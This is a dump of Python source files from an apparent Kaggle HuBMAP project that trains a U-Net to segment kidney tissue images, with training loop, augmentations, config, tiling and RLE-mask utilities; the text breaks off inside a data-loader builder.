repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
GenoM87/hubmap | src/engine/fitter.py | import os, sys, time, warnings, datetime, gc
from collections import OrderedDict
import pandas as pd
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn.functional as F
import albumentations as A
import rasterio
from utils import create_tile_v2, rle2mask, to_mask, global_shift_mask
from data_builder.transforms import get_valid_transform
from .average import AverageMeter
from models.optimizer import make_optimizer
from models.scheduler import make_scheduler
from models.loss import binary_xloss, dice_coefficient, dice_coeff
from models.SegLoss.losses_pytorch.dice_loss import SoftDiceLoss
class Fitter:
def __init__(self, model, cfg, train_loader, val_loader, logger, exp_path):
self.experiment_path = exp_path
os.makedirs(self.experiment_path, exist_ok=True)
self.model = model.to(cfg.DEVICE)
self.cfg = cfg
self.train_loader = train_loader
self.val_loader = val_loader
self.logger = logger
self.criterion = SoftDiceLoss()
self.optimizer = make_optimizer(
self.model, self.cfg
)
self.scheduler = make_scheduler(
self.optimizer,
self.cfg,
self.train_loader
)
self.epoch = 0
self.val_score = 0
self.best_threshold = 0
self.logger.info(f'Avvio training {datetime.datetime.now()} con i seguenti parametri:')
self.logger.info(self.cfg)
def train(self):
#Start training loop
for epoch in range(self.epoch, self.cfg.SOLVER.NUM_EPOCHS):
if epoch < self.cfg.SOLVER.WARMUP_EPOCHS:
#Create increasing lr
lr = np.linspace(
start=self.cfg.SOLVER.MIN_LR,
stop=self.cfg.SOLVER.LR,
num=self.cfg.SOLVER.WARMUP_EPOCHS
)
for g in self.optimizer.param_groups:
g['lr'] = lr[epoch]
self.logger.info(f'[TRAIN]WARMUP: Increasing learning rate to {lr[epoch]}')
t = time.time()
summary_loss = self.train_one_epoch()
self.logger.info(
f'''[RESULT]: Train. Epoch: {self.epoch},
summary_loss: {summary_loss.avg:.5f},
time: {(time.time() - t):.3f}'''
)
valid_loss, valid_dice, best_thr = self.validate()
if self.cfg.SOLVER.SCHEDULER == 'ReduceLROnPlateau':
self.scheduler.step(valid_loss)
else:
self.scheduler.step()
self.logger.info(
f'''[RESULT]: Val. Epoch: {self.epoch},
validation_loss: {valid_loss.avg:.5f},
Best Score Threshold: {self.best_threshold:.2f},
Best Score: {valid_dice:.5f},
time: {(time.time() - t):.3f}'''
)
self.epoch += 1
if valid_dice > self.val_score:
self.model.eval()
self.save(
os.path.join(self.experiment_path, f'unet_best.ckpt'))
self.val_score = valid_dice
self.best_threshold = best_thr
def train_one_epoch(self):
self.model.train()
summary_loss = AverageMeter()
t = time.time()
train_loader = tqdm(self.train_loader, total=len(self.train_loader), desc='Training')
for step, (imgs, masks) in enumerate(train_loader):
self.optimizer.zero_grad()
batch_size = imgs.shape[0]
imgs = imgs.to(self.cfg.DEVICE)
targets = masks.to(self.cfg.DEVICE).unsqueeze(1)
prob = self.model(imgs)
loss = self.criterion(prob, targets)
loss.backward()
self.optimizer.step()
summary_loss.update(loss.detach().cpu().item(), batch_size)
train_loader.set_description(
f'Train Step {step}/{len(self.train_loader)}, ' + \
f'Learning rate {self.optimizer.param_groups[0]["lr"]}, ' + \
f'summary_loss: {summary_loss.avg:.5f}, ' + \
f'time: {(time.time() - t):.3f}'
)
return summary_loss
def validate(self):
self.model.eval()
t = time.time()
summary_loss = AverageMeter()
val_loader = tqdm(self.val_loader, total=len(self.val_loader), desc='Valid')
valid_probability = []
valid_mask = []
for step, (imgs, masks) in enumerate(val_loader):
targets = masks.to(self.cfg.DEVICE)
imgs = imgs.to(self.cfg.DEVICE)
batch_size = imgs.shape[0]
with torch.no_grad():
prob = self.model(imgs).squeeze()
loss = self.criterion(prob, targets)
summary_loss.update(loss, batch_size)
valid_probability.append(prob.detach().cpu().numpy())
valid_mask.append(targets.detach().cpu().numpy())
val_loader.set_description(
f'Valid Step {step}/{len(self.val_loader)}, ' + \
f'Learning rate {self.optimizer.param_groups[0]["lr"]}, ' + \
f'summary_loss: {summary_loss.avg:.5f}, ' + \
f'time: {(time.time() - t):.3f}'
)
probability = np.concatenate(valid_probability)
mask = np.concatenate(valid_mask)
act_dice = 0
best_dice = 0
for thr in np.linspace(0, 1, num=20):
pred = (probability>thr).astype(np.uint8)
act_dice = dice_coefficient(pred, mask)
if act_dice>best_dice:
self.logger.info(
f'[VALID]Epoch: {self.epoch} Found best dice at thr {thr}: {act_dice}'
)
best_thr = thr
best_dice = act_dice
self.best_threshold = best_thr
return summary_loss, best_dice, best_thr
def save(self, path):
self.model.eval()
torch.save({
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'scheduler_state_dict': self.scheduler.state_dict(),
'best_threshold': self.best_threshold,
'val_score': self.val_score,
'epoch': self.epoch,
}, path)
def save_model(self, path):
self.model.eval()
torch.save({
'model_state_dict': self.model.state_dict(),
'best_threshold': self.best_threshold,
'val_score': self.val_score,
}, path)
def load(self, path):
checkpoint = torch.load(path)
self.model.load_state_dict(checkpoint['model_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
self.scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
self.best_threshold = checkpoint['best_threshold']
self.val_score = checkpoint['val_score']
self.epoch = checkpoint['epoch'] + 1
def final_check(self):
ckpt = torch.load(self.cfg.MODEL.CHECKPOINT_PATH)
if 'model_state_dict' in list(ckpt.keys()):
self.load(self.cfg.MODEL.CHECKPOINT_PATH)
else:
state_dict = ckpt['state_dict']
state = OrderedDict([(key.split("model.")[-1], state_dict[key]) for key in state_dict])
self.model.load_state_dict(state)
del ckpt, state, state_dict
gc.collect()
self.model = self.model.to(self.cfg.DEVICE)
self.model.eval()
t = time.time()
norm = A.Normalize()
df = pd.read_csv(
os.path.join(self.cfg.DATA_DIR, 'train.csv')
)
for img_id in self.cfg.DATASET.VALID_ID:
#Tile creation per l'immagine phase=valid per usare i parametri di test
tile = create_tile_v2(
img_id, df, self.cfg, phase='valid'
)
path_img = os.path.join(
self.cfg.DATA_DIR, 'train', img_id+'.tiff'
)
identity = rasterio.Affine(1, 0, 0, 0, 1, 0)
dataset = rasterio.open(path_img, transform=identity, num_threads = 'all_cpus',)
h, w = dataset.shape
encoding = df[df['id']==img_id]['encoding'].values[0]
#CREO LA MASCHERA E RIDEFINISCO h,w
mask = rle2mask(encoding, (w, h))
mask = cv2.resize(
mask, dsize=None,
fx=self.cfg.DATASET.IMG_SCALE,
fy=self.cfg.DATASET.IMG_SCALE,
interpolation=cv2.INTER_AREA
)
h, w = mask.shape
tile_image = tile['img_tile']
tile_image = np.stack(tile_image)[..., ::-1]
tile_image = norm(image=tile_image)['image']
tile_image = np.ascontiguousarray(tile_image.transpose(0,3,1,2))
batch = np.array_split(tile_image, len(tile_image)//4)
tile_prob = []
#itero per tutti i batch
for num, imgs in enumerate(batch):
imgs = torch.from_numpy(imgs).to(self.cfg.DEVICE)
p = []
with torch.no_grad():
#plain image
y_hat = self.model(imgs)
p.append(torch.sigmoid(y_hat))
#horizontal flip
y_hat = self.model(imgs.flip(dims=(2,)))
p.append(torch.sigmoid(y_hat.flip(dims=(2,))))
#vertical flip
y_hat = self.model(imgs.flip(dims=(3,)))
p.append(torch.sigmoid(y_hat.flip(dims=(3,))))
p = torch.stack(p).mean(0)
tile_prob.append(p.data.detach().cpu().numpy())
tile_prob = np.concatenate(tile_prob).squeeze()
mask_pred = to_mask(
tile_prob,
tile['coord'],
h,
w,
self.cfg.DATASET.TEST_TILE_SIZE
)
predict = (mask_pred>self.best_threshold).astype(np.float32)
base_dice = dice_coefficient(predict, mask)
self.logger.warning(f'''
[VALID]Immagine: {img_id}, Dice Coeff con threshold {self.best_threshold}: {base_dice}
''')
self.logger.warning(f'[VALID]Avvio ricerca best thr per immagine {img_id}')
for thr in np.linspace(0, 1, 21):
predict = (mask_pred>thr).astype(np.float32)
dice = dice_coefficient(predict, mask)
if dice>base_dice:
base_dice=dice
self.best_threshold = thr
self.logger.warning(f'''
[VALID]Immagine: {img_id}, Dice Coeff finale con threshold {self.best_threshold}: {base_dice}
''')
#Scrittura con previsioni finali
predict = (mask_pred>self.best_threshold).astype(np.float32)
#Scrittura delle immagini finali
cv2.imwrite(
os.path.join(self.experiment_path, img_id+'.probability.png'), mask_pred*255
)
cv2.imwrite(
os.path.join(self.experiment_path, img_id+'.predict.png'), predict*255
)
cv2.imwrite(
os.path.join(self.experiment_path, img_id+'.mask.png'), mask*255
)
def compute_shift(self):
ckpt = torch.load(self.cfg.MODEL.CHECKPOINT_PATH)
if 'model_state_dict' in list(ckpt.keys()):
self.load(self.cfg.MODEL.CHECKPOINT_PATH)
else:
state_dict = ckpt['state_dict']
state = OrderedDict([(key.split("model.")[-1], state_dict[key]) for key in state_dict])
self.model.load_state_dict(state)
del ckpt, state, state_dict
gc.collect()
self.model = self.model.to(self.cfg.DEVICE)
self.model.eval()
t = time.time()
norm = A.Normalize()
df = pd.read_csv(
os.path.join(self.cfg.DATA_DIR, 'train.csv')
)
f = open(
os.path.join(self.experiment_path, 'compute_shift.txt'), 'a'
)
for img_id in list(df['id']):
#Tile creation per l'immagine phase=valid per usare i parametri di test
tile = create_tile_v2(
img_id, df, self.cfg, phase='valid'
)
path_img = os.path.join(
self.cfg.DATA_DIR, 'train', img_id+'.tiff'
)
identity = rasterio.Affine(1, 0, 0, 0, 1, 0)
dataset = rasterio.open(path_img, transform=identity, num_threads = 'all_cpus',)
h, w = dataset.shape
encoding = df[df['id']==img_id]['encoding'].values[0]
#CREO LA MASCHERA E RIDEFINISCO h,w
mask = rle2mask(encoding, (w, h))
mask = cv2.resize(
mask, dsize=None,
fx=self.cfg.DATASET.IMG_SCALE,
fy=self.cfg.DATASET.IMG_SCALE,
interpolation=cv2.INTER_AREA
)
h, w = mask.shape
tile_image = tile['img_tile']
tile_image = np.stack(tile_image)[..., ::-1]
tile_image = norm(image=tile_image)['image']
tile_image = np.ascontiguousarray(tile_image.transpose(0,3,1,2))
batch = np.array_split(tile_image, len(tile_image)//4)
tile_prob = []
#itero per tutti i batch
for num, imgs in enumerate(batch):
imgs = torch.from_numpy(imgs).to(self.cfg.DEVICE)
p = []
with torch.no_grad():
#plain image
y_hat = self.model(imgs)
p.append(torch.sigmoid(y_hat))
#horizontal flip
y_hat = self.model(imgs.flip(dims=(2,)))
p.append(torch.sigmoid(y_hat.flip(dims=(2,))))
#vertical flip
y_hat = self.model(imgs.flip(dims=(3,)))
p.append(torch.sigmoid(y_hat.flip(dims=(3,))))
p = torch.stack(p).mean(0)
tile_prob.append(p.data.detach().cpu().numpy())
tile_prob = np.concatenate(tile_prob).squeeze()
mask_pred = to_mask(
tile_prob,
tile['coord'],
h,
w,
self.cfg.DATASET.TEST_TILE_SIZE
)
predict = (mask_pred>self.best_threshold).astype(np.float32)
shift_x = np.linspace(-25, 25, 51, dtype=int)
shift_y = np.linspace(-25, 25, 51, dtype=int)
best_score = dice_coefficient(predict, mask)
f.write(f'Starting search for image: {img_id} with dice: {best_score}')
for sh_x in shift_x:
for sh_y in shift_y:
pred_shft = global_shift_mask(predict, y_shift=sh_y, x_shift=sh_x)
dice_shft = dice_coefficient(pred_shft, mask)
if dice_shft>=best_score:
f.write(f'Better shifting found {img_id} - x: {sh_x}, y: {sh_y}, dice: {dice_shft:.4f} \n')
best_score = dice_shft
f.close()
|
GenoM87/hubmap | src/data_builder/transforms.py | import cv2
import albumentations as A
from albumentations.pytorch import ToTensorV2
def get_train_transform(cfg):
return A.Compose([
#A.OneOf([
# A.OpticalDistortion(p=cfg.DATASET.P_OPTICAL_DIST),
# A.GridDistortion(p=cfg.DATASET.P_GRID_DIST),
# A.IAAPiecewiseAffine(p=cfg.DATASET.P_PIECEWISE_AFFINE),
#], p=0.3),
A.OneOf([
A.HueSaturationValue(10,15,10, p=cfg.DATASET.P_HUE_SATURATION),
A.CLAHE(clip_limit=2, p=cfg.DATASET.P_CLAHE),
#A.RandomBrightnessContrast(p=cfg.DATASET.P_RANDOM_BRIGHTNESS),
], p=0.3),
A.HorizontalFlip(cfg.DATASET.P_HORIZONATL_FLIP),
A.VerticalFlip(cfg.DATASET.P_VERTICAL_FLIP),
A.RandomRotate90(cfg.DATASET.P_RANDOM_ROTATE),
A.ShiftScaleRotate(
shift_limit=0.0625, scale_limit=0.2, rotate_limit=15, p=cfg.DATASET.P_SHIFT_SCALE,
border_mode=cv2.BORDER_REFLECT
),
A.Resize(height=cfg.DATASET.IMG_HEIGHT, width=cfg.DATASET.IMG_WIDTH),
A.Normalize(),
ToTensorV2()
])
def get_valid_transform(cfg):
return A.Compose([
#A.Resize(height=cfg.DATASET.IMG_HEIGHT, width=cfg.DATASET.IMG_WIDTH),
A.Normalize(),
ToTensorV2()
])
def get_test_transform(cfg):
return A.Compose([
A.Resize(height=cfg.DATASET.IMG_HEIGHT, width=cfg.DATASET.IMG_WIDTH),
A.Normalize(),
ToTensorV2()
]) |
GenoM87/hubmap | src/config.py | <reponame>GenoM87/hubmap<filename>src/config.py
import pathlib
import os
import torch
from yacs.config import CfgNode as CN
#GENERAL CONFIG
_C = CN()
_C.PROJECT_DIR = str(pathlib.Path(__file__).parent.parent.absolute())
_C.DATA_DIR = os.path.join(_C.PROJECT_DIR, 'data')
_C.DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'
#Dataset config
_C.DATASET = CN()
#TILE CREATION
_C.DATASET.IMG_SCALE = 0.25
_C.DATASET.TRAIN_TILE_SIZE = 320
_C.DATASET.TRAIN_TILE_AVG_STEP = 160
_C.DATASET.TRAIN_TILE_MIN_SCORE = 0.25
_C.DATASET.TEST_TILE_SIZE = 320
_C.DATASET.TEST_TILE_AVG_STEP = 160
_C.DATASET.TEST_TILE_MIN_SCORE = 0.25
_C.DATASET.TILE_DIR = os.path.join(
_C.DATA_DIR,
'train',
f'{_C.DATASET.IMG_SCALE}_{_C.DATASET.TRAIN_TILE_MIN_SCORE}_{_C.DATASET.TRAIN_TILE_SIZE}_{_C.DATASET.TRAIN_TILE_AVG_STEP}_train'
)
_C.DATASET.VALID_ID = '54f2eec69', 'aaa6a05cc'
_C.DATASET.TEST_DIR = os.path.join(
_C.DATA_DIR,
'test',
f'{_C.DATASET.IMG_SCALE}_{_C.DATASET.TEST_TILE_MIN_SCORE}_{_C.DATASET.TEST_TILE_SIZE}_{_C.DATASET.TEST_TILE_AVG_STEP}_test'
)
#DATASET AUGMENTATION
_C.DATASET.IMG_HEIGHT = 256
_C.DATASET.IMG_WIDTH = 256
_C.DATASET.H_FLIP_PROB = 0.3
_C.DATASET.P_OPTICAL_DIST = 0.3
_C.DATASET.P_GRID_DIST = 0.3
_C.DATASET.P_PIECEWISE_AFFINE = 0.3
_C.DATASET.P_HUE_SATURATION = 0.3
_C.DATASET.P_CLAHE = 0.3
_C.DATASET.P_RANDOM_BRIGHTNESS = 0.3
_C.DATASET.P_HORIZONATL_FLIP = 0.3
_C.DATASET.P_VERTICAL_FLIP = 0.3
_C.DATASET.P_RANDOM_ROTATE = 0.3
_C.DATASET.P_SHIFT_SCALE = 0.3
_C.DATASET.NUM_WORKERS = 2
#Loader config
_C.TRAIN_LOADER = CN()
_C.TRAIN_LOADER.BATCH_SIZE = 32
_C.TRAIN_LOADER.NUM_WORKERS = 4
_C.VALID_LOADER = CN()
_C.VALID_LOADER.BATCH_SIZE = 32
_C.VALID_LOADER.NUM_WORKERS = 4
#solver config
_C.SOLVER = CN()
_C.SOLVER.NUM_EPOCHS = 60
_C.SOLVER.WARMUP_EPOCHS = 10
#'Adam', SGD, Ranger, RangerQH (quasi hyperbolic momentum), RangerALR (adaptive learning rate)
_C.SOLVER.OPTIMIZER = 'RangerALR'
_C.SOLVER.SCHEDULER = 'CosineAnnealingLR'
_C.SOLVER.SCHEDULER_MODE = 'max'
_C.SOLVER.LR = 1e-03
_C.SOLVER.MIN_LR = 1e-05
_C.SOLVER.WEIGHT_DECAY = 0
_C.SOLVER.BETAS = (0.9, 0.999)
_C.SOLVER.AMSGRAD = True
_C.SOLVER.SCHEDULER_REDFACT = 0.1
_C.SOLVER.SCHEDULER_PATIENCE = 3
#Parametri per CosineAnnealing
_C.SOLVER.SCHEDULER_COS_CPOCH = 2
_C.SOLVER.SCHEDULER_T_MUL = 2
_C.SOLVER.T_MAX = 6 #PER COSINEANNEALINGLR
#Model config
_C.MODEL = CN()
_C.MODEL.NAME = 'resnet34'
_C.MODEL.PRETRAINING = 'imagenet'
_C.MODEL.ATTENTION = True
_C.MODEL.CHECKPOINT_PATH = '/home/giorgio/Scrivania/Kaggle/hubmap/experiments/resnet34/2020-12-30/unet_best.ckpt' |
GenoM87/hubmap | src/data_builder/dataset.py | import os
import datetime
import pandas as pd
import numpy as np
import cv2
import matplotlib.pyplot as plt
import torch
from torch.utils.data import Dataset, DataLoader
import albumentations as A
class hmTrainDataset(Dataset):
def __init__(self, df, img_ids, cfg, transforms=None, preprocessing=None):
self.img_ids = img_ids
self.df = df[df['image_id'].isin(img_ids)]
self.cfg = cfg
self.tile_dir = cfg.DATASET.TILE_DIR
self.transforms = transforms
self.preprocessing = preprocessing
def __len__(self):
return self.df.shape[0]
def __getitem__(self, idx:int):
row = self.df.iloc[idx]
path_img = os.path.join(
self.tile_dir,
row['image_id']
)
img = cv2.imread(
os.path.join(path_img, 'x'+str(row['cx'])+'_y'+str(row['cy'])+'.png'),
cv2.IMREAD_COLOR
)
mask = cv2.imread(
os.path.join(path_img, 'x'+str(row['cx'])+'_y'+str(row['cy'])+'.mask.png'),
cv2.IMREAD_GRAYSCALE
)
if self.transforms:
augmented = self.transforms(image=img, mask=mask)
img = augmented['image']
mask = augmented['mask']
if self.preprocessing:
preprocessed = self.preprocessing(image=img, mask=mask)
img = preprocessed['image']
mask = preprocessed['mask']
return img, mask
class hmTestDataset(Dataset):
def __init__(self, df, img_ids, cfg, transforms=None, preprocessing=None):
self.img_ids = img_ids
self.df = df[df['image_id'].isin(img_ids)]
self.cfg = cfg
self.tile_dir = cfg.DATASET.TILE_DIR
self.transforms = transforms
self.preprocessing = preprocessing
def __len__(self):
return self.df.shape[0]
def __getitem__(self, idx:int):
row = self.df.iloc[idx]
path_img = os.path.join(
self.tile_dir,
row['image_id']
)
img = cv2.imread(
os.path.join(path_img, 'x'+str(row['cx'])+'_y'+str(row['cy'])+'.png'),
cv2.IMREAD_COLOR
)
if self.transforms:
augmented = self.transforms(image=img)
img = augmented['image']
if self.preprocessing:
preprocessed = self.preprocessing(image=img)
img = preprocessed['image']
return img |
GenoM87/hubmap | src/models/model.py | import segmentation_models_pytorch as smp
from config import _C as cfg
def build_model(cfg):
if cfg.MODEL.ATTENTION:
model = smp.Unet(
encoder_name=cfg.MODEL.NAME,
encoder_weights=cfg.MODEL.PRETRAINING,
in_channels=3,
classes=1,
decoder_attention_type='scse',
activation='sigmoid' #attivazione sigmoid per output probabilità/ #None per far uscire i logit
)
else:
model = smp.Unet(
encoder_name=cfg.MODEL.NAME,
encoder_weights=cfg.MODEL.PRETRAINING,
in_channels=3,
classes=1,
activation='sigmoid' #attivazione sigmoid per output probabilità/ #None per far uscire i logit
)
return model |
GenoM87/hubmap | src/utils.py | import os
import cv2
import numpy as np
import tifffile as tiff
import rasterio
from rasterio.windows import Window
identity = rasterio.Affine(1, 0, 0, 0, 1, 0)
def mask2rle(img):
'''
img: numpy array, 1 - mask, 0 - background
Returns run length as string formated
'''
pixels= img.T.flatten()
pixels = np.concatenate([[0], pixels, [0]])
runs = np.where(pixels[1:] != pixels[:-1])[0] + 1
runs[1::2] -= runs[::2]
return ' '.join(str(x) for x in runs)
def rle2mask(mask_rle, shape=(1600,256)):
'''
mask_rle: run-length as string formated (start length)
shape: (width,height) of array to return
Returns numpy array, 1 - mask, 0 - background
'''
s = mask_rle.split()
starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]
starts -= 1
ends = starts + lengths
img = np.zeros(shape[0]*shape[1], dtype=np.uint8)
for lo, hi in zip(starts, ends):
img[lo:hi] = 1
return img.reshape(shape).T
def read_tiff(img_path):
img = tiff.imread(img_path)
img = np.squeeze(img)
if img.shape[0]==3:
img = img.transpose(1,2,0)
img = np.ascontiguousarray(img)
return img
def create_tile_v2(img_id, df, cfg, phase='train'):
'''
'''
#Definizione parametri per creazone tile (da modificare per img_scale)
img_scale = cfg.DATASET.IMG_SCALE
if phase=='train':
tile_min_score = cfg.DATASET.TRAIN_TILE_MIN_SCORE
tile_size = cfg.DATASET.TRAIN_TILE_SIZE
tile_avg_step = cfg.DATASET.TRAIN_TILE_AVG_STEP
else:
tile_min_score = cfg.DATASET.TEST_TILE_MIN_SCORE
tile_size = cfg.DATASET.TEST_TILE_SIZE
tile_avg_step = cfg.DATASET.TEST_TILE_AVG_STEP
tile_size = tile_size / img_scale
tile_avg_step = tile_avg_step / img_scale
half = int(tile_size // 2)
if phase=='train':
path_img = os.path.join(cfg.DATA_DIR, 'train', img_id+'.tiff')
else:
path_img = os.path.join(cfg.DATA_DIR, 'train', img_id+'.tiff')
dataset = rasterio.open(path_img, transform=identity, num_threads = 'all_cpus')
h, w = dataset.shape
#creazione della mask
rle = df.loc[df['id']==img_id]['encoding'].values[0]
mask = rle2mask(rle, (w, h))
#creazione delle coordinate
coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
coord = []
reject = []
tile_img = []
tile_mask = []
for cy in coord_y:
for cx in coord_x:
#leggo l'immagine dal formato originale
img = dataset.read(
[1,2, 3],
window=Window.from_slices((cy-half, cy+half), (cx-half, cx+half))
).transpose(1,2,0)
mask_t = mask[cy-half:cy+half, cx-half:cx+half]
#faccio resize per tile scale
img = cv2.resize(
img,
dsize=None,
fx=img_scale,
fy=img_scale,
interpolation = cv2.INTER_AREA
)
mask_t = cv2.resize(
mask_t,
dsize=None,
fx=img_scale,
fy=img_scale,
interpolation = cv2.INTER_AREA
)
#filtro via per le immagini che non contengono nulla
structure = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
structure = (structure[:, :, 1] > 32).astype(np.uint8)
structure = structure.astype(np.float32)
curr_val = structure.mean()
if curr_val>tile_min_score:
coord.append([int(cx*img_scale), int(cy*img_scale), curr_val])
tile_img.append(img)
tile_mask.append(mask_t)
else:
reject.append([int(cx*img_scale), int(cy*img_scale), curr_val])
return {
'coord': coord,
'reject': reject,
'img_tile': tile_img,
'mask_tile': tile_mask
}
def create_tile(img, mask, img_scale, tile_min_score, tile_size, tile_avg_step):
'''
img: tiff img full shape (H,W,C)
mask: mask come from rle_decode (H,W)
img_scale: scale to resize original image
img_min_score: filter image with min score (prevent empty tile)
tile_size: size of the tile
tile_avg_step: average step for tile creation
'''
half = tile_size//2
#TODO: provare altre interpolazioni #INTER LINEAR ecc..
img_small = cv2.resize(img, dsize=None, fx=img_scale, fy=img_scale, interpolation = cv2.INTER_AREA)
mask_small = cv2.resize(mask.astype(np.uint8), dsize=None, fx=img_scale, fy=img_scale, interpolation = cv2.INTER_AREA)
structure = cv2.cvtColor(img_small, cv2.COLOR_RGB2HSV)
structure = (structure[:, :, 1] > 32).astype(np.uint8)
structure = structure.astype(np.float32)
h, w, _ = img_small.shape
#creo il linspace per "tagliare" l'immagine in tile
coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
coord = []
reject = []
for cy in coord_y:
for cx in coord_x:
#filtro via per le immagini che non contengono nulla
curr_val = structure[cy-half:cy+half, cx-half:cx+half].mean()
if curr_val>tile_min_score:
coord.append([cx, cy, curr_val])
else:
reject.append([cx, cy, curr_val])
tile_mask = []
tile_img = []
for cx, cy, cv in coord:
im = img_small[cy-half:cy+half,cx-half:cx+half]
ms = mask_small[cy-half:cy+half,cx-half:cx+half]
tile_img.append(im)
tile_mask.append(ms)
return {
'coord': coord,
'reject': reject,
'img': img_small,
'img_tile': tile_img,
'structure': structure,
'mask_small': mask_small,
'mask_tile': tile_mask
}
def create_tile_subm_v2(img_id, img_scale, tile_min_score, tile_size, tile_avg_step):
'''
create_tile_v2: funzione per creare i tile usando rasterio come engine.
funzione per la prediction
'''
tile_size = tile_size / img_scale
tile_avg_step = tile_avg_step / img_scale
half = tile_size//2
path_img = os.path.join(DATA, img_id+'.tiff')
dataset = rasterio.open(path_img, trasform=identity, num_threads = 'all_cpus')
h, w = dataset.shape
coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
coord = []
reject = []
tile_img = []
for cy in coord_y:
for cx in coord_x:
#leggo l'immagine dal formato originale
img = dataset.read(
[1,2, 3],
window=Window.from_slices((cy-half, cy+half), (cx-half, cx+half))
).transpose(1,2,0)
#faccio resize per tile scale
img = cv2.resize(
img,
dsize=None,
fx=img_scale,
fy=img_scale,
interpolation = cv2.INTER_AREA
)
#filtro via per le immagini che non contengono nulla
structure = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
structure = (structure[:, :, 1] > 32).astype(np.uint8)
structure = structure.astype(np.float32)
curr_val = structure.mean()
if curr_val>tile_min_score:
coord.append([int(cx*img_scale), int(cy*img_scale), curr_val])
tile_img.append(img)
else:
reject.append([int(cx*img_scale), int(cy*img_scale), curr_val])
return {
'coord': coord,
'reject': reject,
'img_tile': tile_img,
}
def create_tile_subm(img, img_scale, tile_min_score, tile_size, tile_avg_step):
'''
create_tile_subm()> Dict:
funzione per creare i tile dell'immagine per la submission (non è presente la mask)
INPUT:
------
img: tiff img full shape (H,W,C)
img_scale: scale to resize original image
img_min_score: filter image with min score (prevent empty tile)
tile_size: size of the tile
tile_avg_step: average step for tile creation
'''
half = tile_size//2
#TODO: provare altre interpolazioni #INTER LINEAR ecc..
img_small = cv2.resize(img, dsize=None, fx=img_scale, fy=img_scale, interpolation = cv2.INTER_AREA)
structure = cv2.cvtColor(img_small, cv2.COLOR_RGB2HSV)
structure = (structure[:, :, 1] > 32).astype(np.uint8)
structure = structure.astype(np.float32)
h, w, _ = img_small.shape
#creo il linspace per "tagliare" l'immagine in tile
coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
coord = []
reject = []
for cy in coord_y:
for cx in coord_x:
#filtro via per le immagini che non contengono nulla
curr_val = structure[cy-half:cy+half, cx-half:cx+half].mean()
if curr_val>tile_min_score:
coord.append([cx, cy, curr_val])
else:
reject.append([cx, cy, curr_val])
tile_img = []
for cx, cy, cv in coord:
im = img_small[cy-half:cy+half,cx-half:cx+half]
tile_img.append(im)
return {
'coord': coord,
'reject': reject,
'img': img_small,
'img_tile': tile_img,
'structure': structure,
}
def to_mask(tile, tile_coord, img_height, img_width, tile_size, aggregate='mean'):
'''
to_mask()>np.array: funzione che permette di creare una mask con dimensioni pari all'immagine
ridimensionata tramite l'utilizzo di un Gaussian filter.
tile: lista dei tile per quella maschera
tile_coord: lista delle coordinate per i tile della maschera
img_height: altezza dell'immagine dopo resize
img_width: larghezza dell'immagine dopo resize
tile_size: dimensione dei tile creati con to_tile
'''
half = tile_size//2
mask = np.zeros((img_height, img_width), np.float32)
count = np.zeros((img_height, img_width), np.float32)
w = np.ones((tile_size,tile_size), np.float32)
#Creo un filtro gaussiano
y,x = np.mgrid[-half:half,-half:half]
y = half-abs(y)
x = half-abs(x)
w = np.minimum(x,y)
w = w/w.max()#*2.5
w = np.minimum(w,1)
for t, (cx, cy, cv) in enumerate(tile_coord):
mask [cy - half:cy + half, cx - half:cx + half] += tile[t]*w
count[cy - half:cy + half, cx - half:cx + half] += w
# see unet paper for "Overlap-tile strategy for seamless segmentation of arbitrary large images"
m = (count != 0)
mask[m] /= count[m]
return mask
def global_shift_mask(maskpred1, y_shift, x_shift):
"""
applies a global shift to a mask by padding one side and cropping from the other
"""
if y_shift <0 and x_shift >=0:
maskpred2 = np.pad(maskpred1, [(0,abs(y_shift)), (abs(x_shift), 0)], mode='constant', constant_values=0)
maskpred3 = maskpred2[abs(y_shift):, :maskpred1.shape[1]]
elif y_shift >=0 and x_shift <0:
maskpred2 = np.pad(maskpred1, [(abs(y_shift),0), (0, abs(x_shift))], mode='constant', constant_values=0)
maskpred3 = maskpred2[:maskpred1.shape[0], abs(x_shift):]
elif y_shift >=0 and x_shift >=0:
maskpred2 = np.pad(maskpred1, [(abs(y_shift),0), (abs(x_shift), 0)], mode='constant', constant_values=0)
maskpred3 = maskpred2[:maskpred1.shape[0], :maskpred1.shape[1]]
elif y_shift < 0 and x_shift < 0:
maskpred2 = np.pad(maskpred1, [(0, abs(y_shift)), (0, abs(x_shift))], mode='constant', constant_values=0)
maskpred3 = maskpred2[abs(y_shift):, abs(x_shift):]
return maskpred3 |
GenoM87/hubmap | src/data_builder/__init__.py | <filename>src/data_builder/__init__.py
from .builder import build_train_loader
from .builder import build_valid_loader |
GenoM87/hubmap | src/data_builder/builder.py | <gh_stars>0
import os
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler
import albumentations as A
import pandas as pd
from .dataset import hmTrainDataset, hmTestDataset
from .transforms import get_train_transform, get_valid_transform
def build_train_loader(cfg):
df = pd.read_csv(
os.path.join(cfg.DATASET.TILE_DIR, 'coord.csv')
)
train_ids = set(df['image_id']) - set(cfg.DATASET.VALID_ID)
train_transform = get_train_transform(cfg)
train_dataset = hmTrainDataset(
df = df,
img_ids = list(train_ids),
cfg = cfg,
transforms=train_transform
)
train_loader = DataLoader(
